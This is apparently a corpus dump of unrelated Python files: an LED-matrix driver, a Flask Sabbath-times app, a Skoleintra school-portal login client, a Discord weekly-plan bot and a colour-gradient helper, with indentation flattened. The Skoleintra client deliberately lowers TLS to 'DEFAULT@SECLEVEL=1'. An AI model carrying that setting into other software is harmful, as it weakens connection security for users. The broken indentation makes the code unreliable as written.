# speed: 0-9 for practical purposes; speed does not have to be integral
# transition: DIR_U, DIR_D, DIR_L, DIR_R, DIR_RU, DIR_RD, DIR_LU, DIR_LD to wipe each letter simultaneously
# in the respective direction (the diagonal directions do not give a true corner-to-corner 'wipe' effect)
# or transition: DISSOLVE for a pseudo-random dissolve from old_message to new_message
delay = 0.5 ** speed
old_message = trim(old_message)
new_message = trim(new_message)
old_data = [ [], [], [], [], [], [], [], [] ]
new_data = [ [], [], [], [], [], [], [], [] ]
pixel = [ [], [], [], [], [], [], [], [] ]
stage_range = range(8)
col_range = range(8)
for col in range(8):
for letter in range(NUM_MATRICES):
old_data[col] += [col+1] + [font[ord(old_message[letter])][col]]
new_data[col] += [col+1] + [font[ord(new_message[letter])][col]]
if transition == DISSOLVE:
pixel[col] += [randrange(8)]
elif transition == DIR_D:
pixel[col] += [0]
elif transition == DIR_U:
pixel[col] += [7]
elif transition == DIR_RU or transition == DIR_LD:
pixel[col] += [col]
elif transition == DIR_RD or transition == DIR_LU:
pixel[col] += [7-col]
elif transition == DIR_L:
col_range = range(7, -1, -1)
stage_range = [0]
elif transition == DIR_R:
stage_range = [0]
for stage in stage_range:
for col in col_range:
if transition == DIR_L or transition == DIR_R:
old_data[col]=new_data[col][:]
else:
for letter in range(NUM_MATRICES):
mask = (0x01 << pixel[col][letter])
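# Bit-select merge on the next line: take only the single pixel row chosen
# by 'mask' from new_data, keeping the other rows of old_data unchanged.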
old_data[col][2*letter+1] = old_data[col][2*letter+1] & ~mask | new_data[col][2*letter+1] & mask
if transition == DISSOLVE:
pixel_jump = 3
elif transition & DIR_D:
pixel_jump = 1
elif transition & DIR_U:
pixel_jump = 7
pixel[col][letter] = (pixel[col][letter] + pixel_jump)%8
send_bytes(old_data[col])
if transition == DIR_L or transition == DIR_R:
time.sleep(delay)
time.sleep(delay)
def trim(text):
# Trim or pad specified text to the length of the MAX7219 array
text += PAD_STRING
text = text[:NUM_MATRICES]
return text
def gfx_set_px(g_x, g_y, state=GFX_INVERT):
# Set an individual pixel in the graphics buffer to on, off, or the inverse of its previous state
if (g_x in gfx_columns) and (g_y in gfx_rows):
if state == GFX_ON:
gfx_buffer[g_x] = gfx_buffer[g_x] | (0x01 << g_y)
elif state == GFX_OFF:
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~(0x01 << g_y)) & 0xFF
elif state == GFX_INVERT:
gfx_buffer[g_x] = (gfx_buffer[g_x] ^ (0x01 << g_y)) & 0xFF
def gfx_set_col(g_col, state=GFX_INVERT):
# Set an entire column in the graphics buffer to on, off, or the inverse of its previous state
if (g_col in gfx_columns):
if state == GFX_ON:
gfx_buffer[g_col] = 0xFF
elif state == GFX_OFF:
gfx_buffer[g_col] = 0x00
elif state == GFX_INVERT:
gfx_buffer[g_col] = (~gfx_buffer[g_col]) & 0xFF
def gfx_set_all(state=GFX_INVERT):
# Set the entire graphics buffer to on, off, or the inverse of its previous state
for g_col in gfx_columns:
if state == GFX_ON:
gfx_buffer[g_col] = 0xFF
elif state == GFX_OFF:
gfx_buffer[g_col] = 0x00
elif state == GFX_INVERT:
gfx_buffer[g_col] = (~gfx_buffer[g_col]) & 0xFF
def gfx_line(start_x, start_y, end_x, end_y, state=GFX_INVERT, incl_endpoint=GFX_ON):
# Draw a straight line in the graphics buffer between the specified start- & end-points
# The line can be drawn by setting each affected pixel to either on, off, or the inverse of its previous state
# The final point of the line (end_x, end_y) can either be included (default) or omitted
# It can be usefully omitted if drawing another line starting from this previous endpoint using GFX_INVERT
start_x, end_x = int(start_x), int(end_x)
start_y, end_y = int(start_y), int(end_y)
len_x = end_x - start_x
len_y = end_y - start_y
if abs(len_x) + abs(len_y) == 0:
if incl_endpoint == GFX_ON:
gfx_set_px(start_x, start_y, state)
elif abs(len_x) > abs(len_y):
step_x = abs(len_x) // len_x # integer step (+1 or -1) so range() accepts it under Python 3
for g_x in range(start_x, end_x + incl_endpoint*step_x, step_x):
g_y = int(start_y + float(len_y) * (float(g_x - start_x)) / float(len_x) + 0.5)
if (g_x in gfx_columns) and (g_y in gfx_rows):
#if (0 <= g_x < 8*NUM_MATRICES) and (0<= g_y <8):
gfx_set_px(g_x, g_y, state)
else:
step_y = abs(len_y) // len_y # integer step (+1 or -1) so range() accepts it under Python 3
for g_y in range(start_y, end_y + incl_endpoint*step_y, step_y):
g_x = int(start_x + float(len_x) * (float(g_y - start_y)) / float(len_y) + 0.5)
if (g_x in gfx_columns) and (g_y in gfx_rows):
#if (0 <= g_x < 8*NUM_MATRICES) and (0<= g_y <8):
gfx_set_px(g_x, g_y, state)
def gfx_letter(char_code, start_x=0, state=GFX_INVERT, font=DEFAULT_FONT):
# Overlay one character from the specified font into the graphics buffer, at a specified horizontal position
# The character is drawn by setting each affected pixel to either on, off, or the inverse of its previous state
start_x = int(start_x)
for l_col in range(0,8):
if (l_col + start_x) in gfx_columns:
#if ((l_col + start_x) >= 0) and (l_col + start_x < NUM_MATRICES*8):
if state == GFX_ON:
gfx_buffer[l_col + start_x] = font[char_code][l_col]
elif state == GFX_OFF:
gfx_buffer[l_col + start_x] = (~font[char_code][l_col]) & 0xFF
elif state == GFX_INVERT:
gfx_buffer[l_col + start_x] = (gfx_buffer[l_col + start_x] ^ font[char_code][l_col]) & 0xFF
def gfx_sprite(sprite, start_x=0, state=GFX_INVERT):
# Overlay a specified sprite into the graphics buffer, at a specified horizontal position
# The sprite is drawn by setting each affected pixel to either on, off, or the inverse of its previous state
# Sprite is an 8-pixel (high) x n-pixel wide pattern, expressed as a list of n bytes eg [0x99, 0x66, 0x5A, 0x66, 0x99]
for l_col in range(0,len(sprite)):
if ((l_col + start_x) >= 0) and (l_col + start_x < NUM_MATRICES*8):
if state == GFX_ON:
gfx_buffer[l_col + start_x] = sprite[l_col]
elif state == GFX_OFF:
gfx_buffer[l_col + start_x] = (~sprite[l_col]) & 0xFF
elif state == GFX_INVERT:
gfx_buffer[l_col + start_x] = (gfx_buffer[l_col + start_x] ^ sprite[l_col]) & 0xFF
def gfx_scroll(direction=DIR_L, start_x=0, extent_x=8*NUM_MATRICES, start_y=0, extent_y=8, new_pixels=GFX_OFF):
# Scroll the specified area of the graphics buffer by one pixel in the given direction
# direction: any of DIR_U, DIR_D, DIR_L, DIR_R, DIR_LU, DIR_RU, DIR_RD, DIR_LD
# Pixels outside the rectangle are unaffected; pixels scrolled outside the rectangle are discarded
# The 'new' pixels in the gap created are either set to on or off depending upon the new_pixels argument
start_x = max(0, min(8*NUM_MATRICES - 1 , int(start_x)))
extent_x = max(0, min(8*NUM_MATRICES - start_x, int(extent_x)))
start_y = max(0, min(7, int(start_y)))
extent_y = max(0, min(8 - start_y, int(extent_y)))
mask = 0x00
for g_y in range(start_y, start_y + extent_y):
mask = mask | (0x01 << g_y)
if direction & DIR_L:
for g_x in range(start_x, start_x + extent_x - 1):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (gfx_buffer[g_x + 1] & mask)
gfx_buffer[start_x + extent_x - 1] = gfx_buffer[start_x + extent_x - 1] & ~mask
if new_pixels == GFX_ON:
gfx_buffer[start_x + extent_x - 1] = gfx_buffer[start_x + extent_x - 1] | mask
elif direction & DIR_R:
for g_x in range(start_x + extent_x - 1, start_x, -1):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (gfx_buffer[g_x - 1] & mask)
gfx_buffer[start_x] = gfx_buffer[start_x] & ~mask
if new_pixels == GFX_ON:
gfx_buffer[start_x] = gfx_buffer[start_x] | mask
if direction & DIR_U:
for g_x in range(start_x, start_x + extent_x):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (((gfx_buffer[g_x] & mask) >> 1) & mask)
if new_pixels == GFX_ON:
gfx_buffer[g_x] = gfx_buffer[g_x] | (0x01 << (start_y + extent_y - 1))
elif direction & DIR_D:
for g_x in range(start_x, start_x + extent_x):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (((gfx_buffer[g_x] & mask) << 1) & mask)
if new_pixels == GFX_ON:
gfx_buffer[g_x] = gfx_buffer[g_x] | (0x01 << start_y)
def gfx_read_buffer(g_x, g_y):
# Return the current state (on=True, off=False) of an individual pixel in the graphics buffer
# Note that this buffer only reflects the operations of these gfx_ functions, since the buffer was last cleared
# The buffer does not reflect the effects of other library functions such as send_matrix_letter() or (static_message()
if (g_x in gfx_columns) and (g_y in gfx_rows):
return (gfx_buffer[g_x] & (0x01 << g_y) != 0)
def gfx_render():
# All of the above gfx_ functions only write to (or read from) a graphics buffer maintained in memory
# This command sends the entire buffer to the matrix array - use it to display the effect of one or more previous gfx_ functions
for g_col in range(8):
column_data = []
for matrix in range(NUM_MATRICES):
column_data += [g_col+1, gfx_buffer[8*matrix + g_col]]
send_bytes(column_data)
def init():
# Initialise all of the MAX7219 chips (see datasheet for details of registers)
send_all_reg_byte(MAX7219_REG_SCANLIMIT, 7) # show all 8 digits
send_all_reg_byte(MAX7219_REG_DECODEMODE, 0) # using a LED matrix (not digits)
send_all_reg_byte(MAX7219_REG_DISPLAYTEST, 0) # no display test
clear_all() # ensure the whole array is blank
brightness(3) # set character intensity: range: 0..15
send_all_reg_byte(MAX7219_REG_SHUTDOWN, 1) # not in shutdown mode (i.e start it up)
gfx_set_all(GFX_OFF) # clear the graphics buffer
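# Illustrative module usage (assumed typical calls, based on the help text
# in the __main__ section below):
# import MAX7219array as m7
# m7.init()
# m7.brightness(8)
# m7.static_message("Hello")
# m7.scroll_message_horiz("Hello world ", repeats=1, speed=5)
# m7.clear_all()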
# -----------------------------------------------------
# Library function definitions end here
# The following script executes if run from command line
# ------------------------------------------------------
if __name__ == "__main__":
import sys
# Parse arguments and attempt to correct obvious errors
try:
# message text
message = sys.argv[1]
# number of marquee repeats
try:
repeats = abs(int(sys.argv[2]))
except (IndexError, ValueError):
repeats = 0
# speed of marquee scrolling
try:
speed = float(sys.argv[3])
except (IndexError, ValueError):
speed = 3
if speed < 1:
speed = 3
elif speed > 9:
speed = 9
# direction of marquee scrolling
try:
direction = sys.argv[4].lower()
if direction in ["dir_r", "dirr", "r", "right", ">", 2]:
direction = 2 # Right
else:
direction = 8 # Left
except (IndexError, ValueError):
direction = 8 # Left
# font
try:
font = sys.argv[5].lower()
if font in ["cp437", "cp437_font", "cp437font", "cp_437", "cp_437font", "cp_437_font"]:
font = CP437_FONT
elif font in ["sinclairs_font", "sinclairs", "sinclair_s", "sinclair_s_font", "sinclairsfont"]:
font = SINCLAIRS_FONT
elif font in ["lcd_font", "lcd", "lcdfont"]:
font = LCD_FONT
elif font in ["tiny_font", "tiny", "tinyfont"]:
font = TINY_FONT
# Note: if further fonts are added to MAX7219fonts.py, add suitable references to parse command line arguments here
else:
font = CP437_FONT
except (IndexError, ValueError):
font = CP437_FONT
# Call the marquee function with the parsed arguments
try:
scroll_message_horiz(message, repeats, speed, direction, font)
except KeyboardInterrupt:
clear_all()
except IndexError:
# If no arguments given, show help text
print "MAX7219array.py"
print "Scrolls a message across an array of MAX7219 8x8 LED boards"
print "Run syntax:"
print " python MAX7219array.py message [repeats [speed [direction [font]]]]"
print " or, if the file has been made executable with chmod +x MAX7219array.py :"
print " ./MAX7219array.py message [repeats [speed [direction [font]]]]"
print "Parameters:"
print " (none) : displays this help information"
print " message : any text to be displayed on the array"
print " if message is more than one word, it must be enclosed in 'quotation marks'"
print " Note: include blank space(s) at the end of 'message' if it is to be displayed multiple times"
print " repeats (optional) : number of times the message is scrolled"
print " repeats = 0 scrolls indefinitely until <Ctrl<C> is pressed"
print " if omitted, 'repeats' defaults to 0 (indefinitely)"
print " speed (optional) : how fast the text is scrolled across the array"
print " 1 (v.slow) to 9 (v.fast) inclusive (not necessarily integral)"
print " if omitted, 'speed' defaults to 3"
print " direction (optional) : direction the text is scrolled"
print " L or R - if omitted, 'direction' defaults to L"
print " font (optional) : font to use for the displayed text"
print " CP437, SINCLAIRS, LCD or TINY only - default 'font' if not recognized is CP437"
print "MAX7219array.py can also be imported as a module to provide a wider range of functions for driving the array"
print " See documentation within the script for details of these functions, and how to setup the library and the array"
``` |
{
"source": "jona42-ui/sabbath",
"score": 2
} |
#### File: jona42-ui/sabbath/application.py
```python
from flask import Flask, flash, redirect, render_template, request, session, abort
from random import randint
import shabbos_web_class
import googleapi
app = Flask(__name__)
@app.route("/")
@app.route("/home")
def index():
#return name
Candletime = shabbos_web_class.return_candletime_string()
countdown = shabbos_web_class.time_remaining()
return render_template(
'index.html',**locals())
if __name__ == "__main__":
app.run()
```
#### File: jona42-ui/sabbath/shabbos_web_class.py
```python
import string
from grabIP import IPadd
def get_data():
import requests, json, datetime
#grabs your latitude, longitude and Time zone
current_year = datetime.datetime.now().strftime('%Y')
IP_data = IPadd()
loc_request=requests.get('http://ip-api.com/json/'+ IP_data)
type(loc_request)
loc_request.status_code==requests.codes.ok
loc_request_json_data = loc_request.text
Location_info = json.loads(loc_request_json_data)
# your location data
longi = str(Location_info['lon'])
latit = str(Location_info['lat'])
city = Location_info['city']
region = Location_info['timezone']
#using your location data to get customized shabbos data
#link is for master heb cal calendar api
heb_cal_address='http://www.hebcal.com/hebcal/?v=1&cfg=json&maj=on&min=on&mod=on&nx=on&year='+current_year+'&month=x&ss=on&mf=on&c=on&geo=pos&latitude=['+latit+']&longitude=['+longi+']&tzid=['+region+']&m=50&s=off'
import time, requests, datetime, json
res = requests.get(heb_cal_address)
# parse the JSON response into a dict
ready = json.loads(res.text)
data = ready.get('items')
return data, city
# finds the next candle-lighting or havdalah event in the calendar data
def parse_data(data):
import requests, json, datetime, googleapi
for i in range(0, len(data)):
if data[i].get('category') == 'candles' or data[i].get('category') == 'havdalah':
date_retrival= data[i].get('date')
date_retrival2 = date_retrival.split('T')
time = date_retrival2[1].split('-')
date_plus_time = date_retrival2[0]+" "+ time[0]
date_obj = datetime.datetime.strptime(date_plus_time, '%Y-%m-%d %H:%M:%S')
event_date = date_obj.strftime('%A %B %d, %Y')
event_time = date_obj.strftime('%I:%M %p')
event_type = data[i].get('category')
#datetime changed to googleapi.local_time()for testing
if date_obj >= googleapi.local_time():
return event_date, event_time, event_type, date_obj
def return_candletime_string():
import datetime
info = get_data()
candletime = parse_data(info[0])
city = info[1]
event_type = candletime[2]
event_date = candletime[0]
event_time = candletime[1]
if event_type == 'candles':
event_type = "Candle lighting"
elif event_type == "havdalah":
event_type = "Havdalah"
else:
event_type = "Event"
return event_type + " in " + city + " on " + event_date + " will be at " + event_time
def time_remaining():
import googleapi
info = get_data()
candletime = parse_data(info[0])
date_obj = candletime[3]
return (date_obj)
"""
localtime = googleapi.local_time()
time_remain = date_obj - localtime
time_remain1 = str(time_remain).split(" ")
days_remain = time_remain1[0]
if days_remain == None or days_remain == 0:
days_remain = str("0")
hours_mins_remain = time_remain1[2].split(":")
hours_remain = hours_mins_remain[0]
if hours_remain == None or hours_remain == 0:
hours_remain == str("0")
minutes_remain = hours_mins_remain[1]
if minutes_remain == None or minutes_remain == 0:
minutes_remain == str("0")
seconds = hours_mins_remain[2]
fl_seconds_remain = float(seconds)
in_seconds_remain = int(fl_seconds_remain)
seconds_remain =str(in_seconds_remain)
return (days_remain, hours_remain, minutes_remain, seconds_remain, date_obj)
"""
"""
def timetil():
#grabs your latitude, longitude and Time zone
import requests, json, datetime
current_year = datetime.datetime.now().strftime('%Y')
loc_request=requests.get('http://ip-api.com/json')
type(loc_request)
loc_request.status_code==requests.codes.ok
loc_request_json_data = loc_request.text
Location_info = json.loads(loc_request_json_data)
# your location data
longi = str(Location_info['lon'])
latit = str(Location_info['lat'])
city = Location_info['city']
region = Location_info['timezone']
#using your location data to get customized shabbos data
#link is for master heb cal calendar api
heb_cal_address='http://www.hebcal.com/hebcal/?v=1&cfg=json&maj=on&min=on&mod=on&nx=on&year='+current_year+'&month=x&ss=on&mf=on&c=on&geo=pos&latitude=['+latit+']&longitude=['+longi+']&tzid=['+region+']&m=50&s=off'
#begin main loop
import json, requests, datetime, time
from subprocess import call
res = requests.get(heb_cal_address)
ready = json.loads(res.text)
data = ready.get('items')
#beginning of main while loop that should hold until candles followed by havdala
for i in range(0, len(data)):
if data[i].get('category') == 'candles' or data[i].get('category') == 'havdalah':
date_retrival = data[i].get('date')
date_retrival2 = date_retrival.split('T')
time = date_retrival2[1].split('-')
date_plus_time = date_retrival2[0] +" "+ time[0]
date_obj = datetime.datetime.strptime(date_plus_time, '%Y-%m-%d %H:%M:%S')
if date_obj >= datetime.datetime.now():
time_remain = date_obj - datetime.datetime.now()
time_remain1 = str(time_remain).split(" ")
days_remain = time_remain1[0]
hours_mins_remain = time_remain1[2].split(":")
hours_remain = hours_mins_remain[0]
minutes_remain = hours_mins_remain[1]
return "You have " + days_remain + " days, " + hours_remain + " hours, and " + minutes_remain +" minutes to go"
print(time_stmt)
print(timetil)
"""
``` |
{
"source": "jona799t/skoleintra-api",
"score": 3
} |
#### File: skoleintra-api/skoleintra/__init__.py
```python
import json
import httpx
import requests
import urllib
import ssl
from urllib3 import poolmanager
from bs4 import BeautifulSoup
from unilogin import Unilogin
class TLSAdapter(requests.adapters.HTTPAdapter): #https://stackoverflow.com/questions/61631955/python-requests-ssl-error-during-requests
def init_poolmanager(self, connections, maxsize, block=False):
"""Create and initialize the urllib3 PoolManager."""
ctx = ssl.create_default_context()
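# Lowering OpenSSL's security level lets the handshake accept the
# weaker ciphers/keys some servers still present (see the Stack
# Overflow link above).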
ctx.set_ciphers('DEFAULT@SECLEVEL=1')
self.poolmanager = poolmanager.PoolManager(
num_pools=connections,
maxsize=maxsize,
block=block,
ssl_version=ssl.PROTOCOL_TLS,
ssl_context=ctx)
class Skoleintra:
def __init__(self, url, type="elev", brugernavn="", adgangskode=""):
self.success = False
self.session = requests.session()
self.session.mount('https://', TLSAdapter())
self.uniloginClient = Unilogin(brugernavn=brugernavn, adgangskode=adgangskode)
self.defaultHeaders = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
}
if url[-1] == "/":
url = url[:-1]
if "https://" not in url and "http://" not in url:
url = "https://" + url
baseUrl = url.split("://")[1].split("/")[0]
if type == "elev":
url = f"{url}/Account/IdpLogin?role=Student&partnerSp=urn%3Aitslearning%3Ansi%3Asaml%3A2.0%3A{baseUrl}"
resp = self.session.get(url, headers=self.defaultHeaders, allow_redirects=False)
cookies = {"Pool": resp.cookies["Pool"], "SsoSessionId": resp.cookies["SsoSessionId"], "__RequestVerificationToken": resp.cookies["__RequestVerificationToken"]} #, "HasPendingSSO": resp.cookies["HasPendingSSO"]
href = f"https://{baseUrl}" + BeautifulSoup(resp.text, 'html.parser').find("a", {"class": "ccl-button sk-button-light-green sk-font-icon sk-button-text-only sk-uni-login-button"}).get("href")
headers = self.defaultHeaders
headers["cookie"] = f"Pool={cookies['Pool']}; SsoSessionId={cookies['SsoSessionId']}; __RequestVerificationToken={cookies['__RequestVerificationToken']}"
resp = self.session.get(href, headers=headers, allow_redirects=False)
location = resp.headers["location"]
authUrl = self.uniloginClient.login(href=location, referer=baseUrl)
resp = self.session.get(authUrl, headers=self.defaultHeaders, allow_redirects=False)
cookies["SsoSelectedSchool"] = resp.cookies["SsoSelectedSchool"]
cookies["UserRole"] = resp.cookies["UserRole"]
cookies["Language"] = resp.cookies["Language"]
cookies[".AspNet.SSO.ApplicationCookie"] = resp.cookies[".AspNet.SSO.ApplicationCookie"]
location = resp.headers["location"]
headers = self.defaultHeaders
headers["cookie"] = f"SsoSelectedSchool={cookies['SsoSelectedSchool']}; Language={cookies['Language']}; .AspNet.SSO.ApplicationCookie={cookies['.AspNet.SSO.ApplicationCookie']}"
resp = self.session.get(location, headers=headers, allow_redirects=False)
html = BeautifulSoup(resp.text, 'html.parser')
href = html.find('form').get('action')
samlResponse = [html.find("input", {"name": "SAMLResponse"}).get("name"), html.find("input", {"name": "SAMLResponse"}).get("value")]
replayState = [html.find("input", {"name": "RelayState"}).get("name"), html.find("input", {"name": "RelayState"}).get("value")]
payload = f"{samlResponse[0]}={urllib.parse.quote_plus(samlResponse[1])}&{replayState[0]}={urllib.parse.quote_plus(replayState[1])}"
headers = self.defaultHeaders
headers["content-length"] = str(len(payload))
headers["content-type"] = "application/x-www-form-urlencoded"
headers["cookie"] = f"Pool={cookies['Pool']}; SsoSessionId={cookies['SsoSessionId']}; __RequestVerificationToken={cookies['__RequestVerificationToken']}; SsoSelectedSchool={cookies['SsoSelectedSchool']}; UserRole={cookies['UserRole']}; Language={cookies['Language']}; .AspNet.SSO.ApplicationCookie={cookies['.AspNet.SSO.ApplicationCookie']}"
resp = self.session.post(href, headers=headers, data=payload, allow_redirects=False)
cookies[".AspNet.ApplicationCookie"] = resp.cookies[".AspNet.ApplicationCookie"]
self.cookies = cookies
self.success = True
def getWeeklyplans(self, week, year):
if len(str(week)) == 1: # zero-pad single-digit weeks, matching the async variant below
week = f"0{week}"
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
"cookie": f"Pool={self.cookies['Pool']}; SsoSessionId={self.cookies['SsoSessionId']}; __RequestVerificationToken={self.cookies['__RequestVerificationToken']}; SsoSelectedSchool={self.cookies['SsoSelectedSchool']}; UserRole={self.cookies['UserRole']}; Language={self.cookies['Language']}; .AspNet.SSO.ApplicationCookie={self.cookies['.AspNet.SSO.ApplicationCookie']}; .AspNet.ApplicationCookie={self.cookies['.AspNet.ApplicationCookie']}",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36",
}
resp = self.session.get(f"https://{self.cookies['SsoSelectedSchool']}/student/weeklyplans/list/item/class/{week}-{year}", headers=headers)
weeklyplan = json.loads(BeautifulSoup(resp.text, 'html.parser').find("div", {"id": "root"}).get("data-clientlogic-settings-weeklyplansapp"))
return weeklyplan
async def getWeeklyplansAsync(self, week, year):
if len(str(week)) == 1:
week = f"0{week}"
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
"cookie": f"Pool={self.cookies['Pool']}; SsoSessionId={self.cookies['SsoSessionId']}; __RequestVerificationToken={self.cookies['__RequestVerificationToken']}; SsoSelectedSchool={self.cookies['SsoSelectedSchool']}; UserRole={self.cookies['UserRole']}; Language={self.cookies['Language']}; .AspNet.SSO.ApplicationCookie={self.cookies['.AspNet.SSO.ApplicationCookie']}; .AspNet.ApplicationCookie={self.cookies['.AspNet.ApplicationCookie']}",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36",
}
async with httpx.AsyncClient() as client:
resp = await client.get(f"https://{self.cookies['SsoSelectedSchool']}/student/weeklyplans/list/item/class/{week}-{year}", headers=headers)
weeklyplan = json.loads(BeautifulSoup(resp.text, 'html.parser').find("div", {"id": "root"}).get("data-clientlogic-settings-weeklyplansapp"))
return weeklyplan
``` |
{
"source": "jona799t/skoleintra-ugeplan-discord-bot",
"score": 3
} |
#### File: jona799t/skoleintra-ugeplan-discord-bot/main.py
```python
import datetime
import json
import discord
import markdownify
from skoleintra import Skoleintra
from asyncer import asyncify
def stringify(html):
return markdownify.markdownify(html, heading_style="SETEXT").replace("\n\n", "\n")
config = json.load(open("config.json"))
if config["skoleintra"]["baseUrl"][-1] != "/":
config["skoleintra"]["baseUrl"] += "/"
skoleintraClient = Skoleintra(brugernavn=config["skoleintra"]["brugernavn"], adgangskode=config["skoleintra"]["adgangskode"], url=config["skoleintra"]["baseUrl"])
client = discord.Client()
@client.event
async def on_ready():
print(f'Logged in as {client.user}')
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name="$help | Lavet af Jonathan#0008"))
@client.event
async def on_message(message):
if message.author == client.user:
return
if message.content.startswith('$help'):
embed = discord.Embed(title="Help", description="**$ugeplan**: *Giver ugeplanen fra den uge du er i (Med mindre det er weekend, så er det den næste)*\n\n**$ugeplan uge-år**: *Giver ugeplanen fra en given uge. Eksempel: ``$ugeplan 10-2022``*", color=discord.Color.from_rgb(26, 144, 130))
await message.reply(embed=embed)
elif message.content.startswith('$ugeplan'):
args = str(message.content).split(" ")
if len(args) == 1:
year, week, day_of_week = datetime.datetime.now().isocalendar()
if day_of_week > 5:
if week == 52:
week = 0
week += 1
elif len(args) == 2:
week = int(args[1].split("-")[0])
year = int(args[1].split("-")[1])
await message.add_reaction('👍')
print(f"Giver ugeplanen til @{message.author}")
ugeplan = await asyncify(skoleintraClient.getWeeklyplans)(week=week, year=year)
response = {"Klasse": ugeplan["SelectedPlan"]["ClassOrGroup"], "Uge": ugeplan["SelectedPlan"]["FormattedWeek"], "Ugeplan": {"General": []}}
i = 0
for lesson in ugeplan["SelectedPlan"]["GeneralPlan"]["LessonPlans"]:
response["Ugeplan"]["General"].append(
{"Lesson": lesson["Subject"]["Title"], "Content": stringify(lesson["Content"]),
"Attachments": []})
if lesson["Attachments"] != []:
for attachment in lesson["Attachments"]:
response["Ugeplan"]["General"][i]["Attachments"].append(config["skoleintra"]["baseUrl"] + attachment["Uri"])
i += 1
for plan in ugeplan["SelectedPlan"]["DailyPlans"]:
response["Ugeplan"][plan["FeedbackFormattedDate"]] = []
i = 0
for lesson in plan["LessonPlans"]:
response["Ugeplan"][plan["FeedbackFormattedDate"]].append(
{"Lesson": lesson["Subject"]["Title"], "Content": stringify(lesson["Content"]),
"Attachments": []})
if lesson["Attachments"] != []:
for attachment in lesson["Attachments"]:
response["Ugeplan"][plan["FeedbackFormattedDate"]][i]["Attachments"].append(f'[{attachment["FileName"]}]({config["skoleintra"]["baseUrl"] + attachment["Uri"]})')
i += 1
i = 0
for day, lessons in response["Ugeplan"].items():
description = ""
for lesson in lessons:
description += f"**_{lesson['Lesson']}:_**\n{lesson['Content']}\n"
if lesson["Attachments"] != []:
description += "**Attachments:**"
for attachment in lesson["Attachments"]:
description += f"{attachment}"
description += "\n\n"
embed = discord.Embed(title=day.title(), description=description, color=discord.Color.from_rgb(26, 144, 130))
embed.set_author(name=f"{response['Klasse']}'s ugeplan", icon_url="https://cdn.discordapp.com/avatars/952176118713184276/e3f73d72b91c8a84c5c5ad4ae6053b53.webp?size=512")
if i == len(response["Ugeplan"])-1:
embed.set_footer(text=f"Opdateret: {datetime.datetime.now()}")
await message.channel.send(embed=embed)
i += 1
client.run(config["token"])
``` |
{
"source": "jonaan99/LEDband",
"score": 3
} |
#### File: client/libs/color_service.py
```python
import numpy as np
class ColorService():
def __init__(self, config):
self._config = config
self.full_gradients = {}
def build_gradients(self):
self.full_gradients = {}
for gradient in self._config["gradients"]:
not_mirrored_gradient = self._easing_gradient_generator(
self._config["gradients"][gradient], # All colors of the current gradient
self._config["device_config"]["LED_Count"]
)
# Mirror the gradient to get a seamless transition from start to end
# [1,2,3,4]
# -> [4,3,2,1,1,2,3,4]
self.full_gradients[gradient] = np.concatenate(
(not_mirrored_gradient[:, ::-1], not_mirrored_gradient),
axis = 1
)
def _easing_gradient_generator(self, colors, length):
"""
returns np.array of given length that eases between specified colours
parameters:
colors - list, colours must be in self.config.colour_manager["colours"]
eg. ["Red", "Orange", "Blue", "Purple"]
length - int, length of array to return. should be from self.config.settings
eg. self.config.settings["devices"]["my strip"]["configuration"]["N_PIXELS"]
"""
def _easing_func(x, length, slope=2.5):
# returns a nice eased curve with defined length and curve
xa = (x/length)**slope
return xa / (xa + (1 - (x/length))**slope)
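# Worked check (illustrative): with slope=2.5 and x = length/2,
# xa = 0.5**2.5 ~= 0.177 and the denominator is 2*0.177, so the curve
# returns exactly 0.5 at the midpoint, easing from 0 up to 1.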
colors = colors[::-1] # needs to be reversed, makes it easier to deal with
n_transitions = len(colors) - 1
ease_length = length // n_transitions
pad = length - (n_transitions * ease_length)
output = np.zeros((3, length))
ease = np.array([_easing_func(i, ease_length, slope=2.5) for i in range(ease_length)])
# for r,g,b
for i in range(3):
# for each transition
for j in range(n_transitions):
# Starting ease value
start_value = colors[j][i]
# Ending ease value
end_value = colors[j+1][i]
# Difference between start and end
diff = end_value - start_value
# Make array of all start value
base = np.empty(ease_length)
base.fill(start_value)
# Make array of the difference between start and end
diffs = np.empty(ease_length)
diffs.fill(diff)
# run diffs through easing function to make smooth curve
eased_diffs = diffs * ease
# add transition to base values to produce curve from start to end value
base += eased_diffs
# append this to the output array
output[i, j*ease_length:(j+1)*ease_length] = base
# cast to int
output = np.asarray(output, dtype=int)
# pad out the ends (bit messy but it works and looks good)
if pad:
for i in range(3):
output[i, -pad:] = output[i, -pad-1]
return output
def colour(self, colour):
# returns the values of a given colour. use this function to get colour values.
if colour in self._config["colours"]:
return self._config["colours"][colour]
else:
print("colour {} has not been defined".format(colour))
return (0,0,0)
```
#### File: client/libs/notification_service.py
```python
from libs.notification_enum import NotificationEnum # pylint: disable=E0611, E0401
from time import sleep
class NotificationService():
def start(self, config_lock, notification_queue_effects_in, notification_queue_effects_out):
self._config_lock = config_lock
self._notification_queue_effects_in = notification_queue_effects_in
self._notification_queue_effects_out = notification_queue_effects_out
